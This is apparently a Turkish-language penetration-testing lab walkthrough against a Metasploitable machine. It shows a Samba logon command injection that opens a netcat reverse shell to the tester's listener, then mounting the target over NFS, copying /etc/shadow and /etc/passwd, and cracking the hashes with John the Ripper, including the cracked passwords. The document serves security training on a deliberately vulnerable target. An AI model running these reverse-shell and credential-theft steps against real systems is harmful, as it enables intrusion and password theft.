logon komutu ile netcat çalıştırmayı ve kendi makinemde listener açarak shell almayı deneyeceğim.

Bunun için;

Önce kendi makinemde nc -nvlp 6666 komutunu çalıştırıyorum.


Ardından Metasploitable makinesinde smb oturumunda aşağıdaki şekilde netcat çalıştırıyorum ve login atlatma uyguluyorum.

[email protected]:~# smbclient //192.168.1.21/tmp

Enter WORKGROUP\root’s password:

Anonymous login successful

Try “help” to get a list of possible commands.

smb: \> logon “./=`nohup nc 192.168.1.26 6666 -e /bin/bash`”

Password:


Listener’ın açık olduğu terminale geçiş yapıyorum ve içerde olduğumu görüyorum.

Bash’e zıplamak için aşağıdaki komutu kullanıyorum.

python -c ‘import pty; pty.spawn(“/bin/sh”)’


Bir zafiyet üzerinden daha hedefi ele geçirdik.


[email protected]:~# mount -t nfs 192.168.1.21:/ /tmp/ceyhun

[email protected]:~# cd /tmp/ceyhun/

[email protected]:/tmp/ceyhun# ls -la

total 104

drwxr-xr-x 21 root root 4096 May 20 2012 .

drwxrwxrwt 21 root root 4096 Oct 31 16:53 ..

drwxr-xr-x 2 root root 4096 May 13 2012 bin

drwxr-xr-x 3 root root 4096 Apr 28 2010 boot

lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom

drwxr-xr-x 2 root root 4096 May 20 2012 dev

drwxr-xr-x 95 root root 4096 Oct 31 14:10 etc

drwxr-xr-x 6 root root 4096 Apr 16 2010 home

drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd

lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server

drwxr-xr-x 13 root root 4096 May 13 2012 lib

drwx—— 2 root root 16384 Mar 16 2010 lost+found

drwxr-xr-x 4 root root 4096 Mar 16 2010 media

drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt

-rw——- 1 root root 7984 Oct 31 14:07 nohup.out

drwxr-xr-x 2 root root 4096 Mar 16 2010 opt

dr-xr-xr-x 2 root root 4096 Apr 28 2010 proc

drwxr-xr-x 13 root root 4096 Oct 31 14:07 root

drwxr-xr-x 2 root root 4096 May 13 2012 sbin

drwxr-xr-x 2 root root 4096 Mar 16 2010 srv

drwxr-xr-x 2 root root 4096 Apr 28 2010 sys

drwxrwxrwt 5 root root 4096 Oct 31 16:37 tmp

drwxr-xr-x 12 root root 4096 Apr 28 2010 usr

drwxr-xr-x 15 root root 4096 May 20 2012 var

lrwxrwxrwx 1 root root 29 Apr 28 2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server

[email protected]:/tmp/ceyhun# cp /tmp/ceyhun/etc/shadow /tmp/passwd-shadow-merged/

[email protected]:/tmp/ceyhun# cp /tmp/ceyhun/etc/passwd /tmp/passwd-shadow-merged/

[email protected]:/tmp/ceyhun# cd ../passwd-shadow-merged/

[email protected]:/tmp/passwd-shadow-merged# unshadow passwd shadow > merged

[email protected]:/tmp/passwd-shadow-merged# john merged

Warning: detected hash type “md5crypt”, but the string is also recognized as “md5crypt-long”

Use the “–format=md5crypt-long” option to force loading these as that type instead

Using default input encoding: UTF-8

Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8×3])

Will run 2 OpenMP threads

Proceeding with single, rules:Single

Press ‘q’ or Ctrl-C to abort, almost any other key for status

user (user)

postgres (postgres)

Warning: Only 20 candidates buffered for the current salt, minimum 48 needed for performance.

Warning: Only 32 candidates buffered for the current salt, minimum 48 needed for performance.

msfadmin (msfadmin)

Warning: Only 21 candidates buffered for the current salt, minimum 48 needed for performance.

Warning: Only 33 candidates buffered for the current salt, minimum 48 needed for performance.

service (service)

Warning: Only 30 candidates buffered for the current salt, minimum 48 needed for performance.

Warning: Only 37 candidates buffered for the current salt, minimum 48 needed for performance.

Warning: Only 38 candidates buffered for the current salt, minimum 48 needed for performance.

Almost done: Processing the remaining buffered candidate passwords, if any.

Warning: Only 20 candidates buffered for the current salt, minimum 48 needed for performance.

Warning: Only 21 candidates buffered for the current salt, minimum 48 needed for performance.

Warning: Only 10 candidates buffered for the current salt, minimum 48 needed for performance.

Further messages of this type will be suppressed.

To see less of these warnings, enable ‘RelaxKPCWarningCheck’ in john.conf

Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist

123456789 (klog)

batman (sys)

Proceeding with incremental:ASCII




Leave a Comment

* By using this form you agree with the storage and handling of your data by this website.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy